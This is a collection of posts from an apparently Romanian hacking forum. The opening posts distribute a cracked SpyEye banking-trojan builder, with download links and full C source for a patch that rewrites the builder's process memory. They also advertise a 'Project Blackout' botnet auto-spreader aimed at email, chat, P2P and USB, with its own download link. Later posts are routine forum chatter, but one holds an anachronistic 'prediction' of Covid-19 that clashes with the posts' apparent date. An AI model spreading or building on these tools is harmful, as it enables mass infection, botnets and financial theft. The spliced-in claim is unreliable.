Nytro

SpyEye.1.1.39.Builder+Patch Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Nici nu stiu daca mai e postat. 1.Start SpyEye.exe 2.Start SpyEyePatch.exe - Klick OK 3.Klick Ok in SpyEye error message and enjoy the Builder Download: http://www.multiupload.com/ZEAYSEAU4W SpyEyePatch SourceCode: #include <Windows.h> #include <tlhelp32.h> typedef LONG ( NTAPI *_NtSuspendProcess )( IN HANDLE ProcessHandle ); typedef LONG ( NTAPI *_NtResumeProcess )( IN HANDLE ProcessHandle ); int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) { TOKEN_PRIVILEGES priv; HANDLE hThis, hToken; LUID luid; hThis = GetCurrentProcess(); OpenProcessToken(hThis, TOKEN_ADJUST_PRIVILEGES, &hToken); LookupPrivilegeValue(0, "seDebugPrivilege", &luid); priv.PrivilegeCount = 1; priv.Privileges[0].Luid = luid; priv.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, false, &priv, 0, 0, 0); CloseHandle(hToken); CloseHandle(hThis); HANDLE ProcessHandle = 0; _NtSuspendProcess NtSuspendProcess = 0; _NtResumeProcess NtResumeProcess = 0; PROCESSENTRY32 processInfo; processInfo.dwSize = sizeof(processInfo); HANDLE processesSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL); CHAR processName[] = "SpyEye.exe"; DWORD PID = 0 ; DWORD Patch1 = 0x4010C5; DWORD Patch2 = 0x4010CA; DWORD Patch3 = 0x4010CC; DWORD Patch4 = 0x4010CD; UCHAR PatchVal1[] = "\xB8\x0C\x11\x40\x00"; UCHAR PatchVal2[] = "\xFF\xD0"; UCHAR PatchVal3[] = "\x90"; UCHAR PatchVal4[] = "\x90"; NtSuspendProcess = (_NtSuspendProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtSuspendProcess" ); NtResumeProcess = (_NtResumeProcess)GetProcAddress( GetModuleHandle( "ntdll" ), "NtResumeProcess" ); if ( processesSnapshot == INVALID_HANDLE_VALUE ){ return 0; } Process32First(processesSnapshot, &processInfo); while ( Process32Next(processesSnapshot, &processInfo)){ if ( !strcmp(processName,processInfo.szExeFile)){ CloseHandle(processesSnapshot); PID = processInfo.th32ProcessID; break; } } if(PID != NULL){ //MessageBoxA(NULL,(LPCSTR)PID,"SpyEye.exe - PID",0); ProcessHandle = OpenProcess( PROCESS_ALL_ACCESS, FALSE, PID); } if ( ProcessHandle != NULL ){ NtSuspendProcess( ProcessHandle ); WriteProcessMemory(ProcessHandle, (LPVOID)Patch1, &PatchVal1, sizeof(PatchVal1)-1, NULL); WriteProcessMemory(ProcessHandle, (LPVOID)Patch2, &PatchVal2, sizeof(PatchVal2)-1, NULL); WriteProcessMemory(ProcessHandle, (LPVOID)Patch3, &PatchVal3, sizeof(PatchVal3)-1, NULL); WriteProcessMemory(ProcessHandle, (LPVOID)Patch4, &PatchVal4, sizeof(PatchVal4)-1, NULL); /* 004010C5 B8 0C114000 MOV EAX,SpyEye.0040110C 004010CA FFD0 CALL EAX 004010CC 90 NOP 004010CD 90 NOP */ MessageBoxA(NULL,"SpyEye should have been patched now.\nJust press OK and enjoy","SpyEye-Patch by Zer0Flag",0); NtResumeProcess( ProcessHandle ); CloseHandle(ProcessHandle); } return 0; } Sursa: SpyEye.1.1.39.Builder+Pat ch - r00tsecurity

Project Blackout V2.5 - Amazing Auto-Spreader Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator de nimic. Project Blackout V2.5 is made to spread your botnet, but it works on every .exe on the internet! Yes, this means: Keyloggers, RATS, Crypted files and much,much, more! Automatically Download and Execute your bot on run Mass Email Spread (This is why gmail username and password is required) Infect all HTML documents Antis MSN Spread *Sends message to all online contacts getting them to download and run your virus* LAN Spread *This one is seriously amazing* P2P Spread - Limewire, eDonkey and much, much more *Amazing, just plain amazing. When you have over 100+ bots all hosting your virus on limewire you will be getting a fuckload of zombies* Skype spread *Send message to all online contacts getting them to download your virus* USB Spread *Its your basic, everyday, 100% working and stable USB auto-sperad* Unique mutex. *This way your bot is unique, and other bots do not copy over yours* Download: http://uppit.com/v/ilj6tmmv

Nu l-am incercat, nu stiu daca e infectat, nu sunt raspunzator pentru nimic. Cred ca a mai fost postat, dar nu cred ca mai era bun link-ul de download. Download: http://www.mediafire.com/?qvpj2us7oxg38cf Sau: http://www.multiupload.com/3D4WKJL6JW

Trebuie sa reactioneze "cei mari". Noi nu prea avem ce face, putem doar sa asteptam. Producatorii de routere, gateway-uri, switch-uri si alte echipamente, cat si ISP-urile si organizatiile care se ocupa cu standardele ar trebui sa ia atitudine si asta cat mai repede. Da, dupa parerea mea pe 12.12.2012 se vor termina adresele IPv4, deci chiar va veni sfarsitul lumii.

Curiosity is our motivation, security is our hobby/job and information si our weapon. Sau cam asa ceva.

De "IT" iti recomand "Fortareata Digitala" de Dan Brown.

Si cum ai "interactionat" din Windows cu exploitul? Cu acel Share sau cu Internet Explorer?

Da, mie imi plac toate headerele, nu sunt foarte pretentios, dar sa gasim textul potrivit. Faceti o lista cu texte mai "stralucite" si supunem la vot.

Hmm, poate ceva de genul: "Accesul la informatie e un drept, sustinem libertatea la informatie." "Information is a right, we support this right".

Nu asa, pack. Am mai stat o zi intreaga sa tot pun teme pe localhost sa vad care ar fi mai stralucite si erau numai porcarii. Alegeti cateva teme, mai reusite, mai intunecate, nu stiu, care sa dea bine.

O intrebare simpla: de ce? PS: Daca gasiti tema X360, parca asa se cheama, ceva asemanator cu tema curenta, ne mai gandim.

Da, trebuie un alt text, momentan nu prea am idei, veniti si voi cu una.

Salut. Deocamdata nu stiu cine esti, dar schimbatul username-urilor poate provoca multa confuzie in randul celorlalti utilizatori. Dar uneori mai schimb cate un username, doar la cei cu putine posturi.

E aiurea chestia cu "mata-i grasa"... Intre timp ganditi-va la un text mai potrivit, in loc de "we don't care...".

De la cel animat parca ma dor ochii, dar celalalte doua imi plac. Sa vad ce zic si ceilalti.

Mie imi place, dar sa fie altceva in dreapta, sau sa nu fie deloc. Si acele texte: shellcode, ASM-ul... Sa fie aranjate altfel, nu stiu, sa se cuprinda mai bine in peisaj.

Inj3ctor aveau o copie dupa milw0rm. Cat despre Happy Ninjas, tocmai asta e ideea, nu trebuie sa stie nimeni cine sunt, sunt "underground".

Da ma, asta voiam sa zic, ei doar se lauda cu lucruri facute de altii. De asta sunt niste ratati.

Defcon 2010 - Who cares about IPv6 Sam Bowne Tocmai l-am vazut, mi s-a parut interesant si prezinta cateva lucruri care ar trebui sa ne intereseze pe toti, lucruri bine de stiut. Durata: 26:57 Youtube: http://www.youtube.com/watch?v=zIUgH2wVt_0

Nu stiu, probabil destul de mult, sunt multe articole intregi postate pe forum. Nu membrii ocupa mult spatiu.

De sarbatori RST a atins numarul de 40000 de membri. Este un numar destul de mare, speram sa creasca si mai mult, dar pe langa cantitate dorim si o crestere a calitatii discutiilor si a mesajelor de pe forum, putin mai multe discutii "tehnice". Speram sa fiti alaturi de noi nu numai ca numar, ci si ca activitate, sa va implicati mai mult. Nu aveti nimic de pierdut cat timp respectati regulile forumului, ale bunului simt si ale eticii. Sunt sigur ca avem printre noi multe persoane foarte inteligente, dar care raman in umbra. Am dori sa ni se alature si impreuna sa realizam ceva. Poate fi doar parerea mea, dar cred ca lucrurile incep sa se indrepte. Vreau doar sa va spun ca am vazut in globul de cristal ca in 2020 va veni un virus care se va numi Covid-19 si eu stiu de el.

Inca o data ratatii de la inj3ct0r au demonstrat ca sunt niste copii si ca nu prea ii duce capul. Ai dreptate pyth0n3. E motivul pentru care mi-am schimbat total impresia despre acesti baieti. Daca erau hackerii in vechiul sens al cuvantului, ar fi facut orice pentru accesul liber la informatie, adica NU ar fi cerut bani pentru niste cursuri care de fapt sunt mai mult pentru script-kiddies. Nici o data nu mi-au placut tutorialele despre "cum sa folosesti un program".

Merge si cu prima. Folderul se deschide cu executabilul "explorer.exe". E in C:\Windows\explorer.exe. Si daca apar spatii folosesti ghilimele. Cu placere

Se poate deschide in Explorer (cred ca asta vrei) cu functia asta: WinExec Function (Windows) Sau mai urat cu: CreateProcess Function (Windows) Nu stiu Delphi, dar cred ca aceste functii se afla intr-un fisier pe care trebuie sa il incluzi. In C++ mai e functia "system" din stdlib.h, dar nu cred ca te ajuta prea mult.

Ooo da, un vechi fan de-al meu cred. Nu stiu cum poti spune ca tu m-ai invatat VB6, cred ca nici macar nu stii VB6. Si nu cred ca am discutat foarte multe noi. Uite cum am invatat VB6: eram moderator pe un alt forum, care exista si azi sub un alt nume, si un baiat pe nickname E.M.I.N.E.M. m-a ajutat. Apoi am citit o carte "draguta" de 900 de pagini si inca una de 700 de pagini care era pentru VB5. Si multa practica, programele de 2 lei. Cum m-ai ajutat tu? Pe PSC am postat cateva proiecte la mult timp dupa ce le-am facut. Oricum, nu stiu prea multe despre tine, doar am o banuiala ca esti doar una dintre "victimele" mele. Nu imi aduc aminte mai nimic de tine, deci nu te-ai facut remarcat cu nimic, nici macar in sensul rau. In fine, ideea e simpla. Eu nu am nimic cu utilizatorii normali. Dar cand apar tot felul de specimente care nu aduc nici un folos forumului si tot ce fac e sa comenteze aiurea, nu am decat sa fac ceea ce trebuie, si sa le dau ban. Cine respecta regulile forumului, ale eticii si ale bunului simt nu are nici o problema cu mine. fmmets: As dori sa vad acel post. Da, mai facem publice adrese de mail si IP-uri ale persoanelor care incearca sa infecteze membri forumului sau cine stie ce tampenii mai fac. In rest nu facem asa ceva. Ar fi mai multe lucruri de spus, dar ce am spus aici cred ca e de ajuns.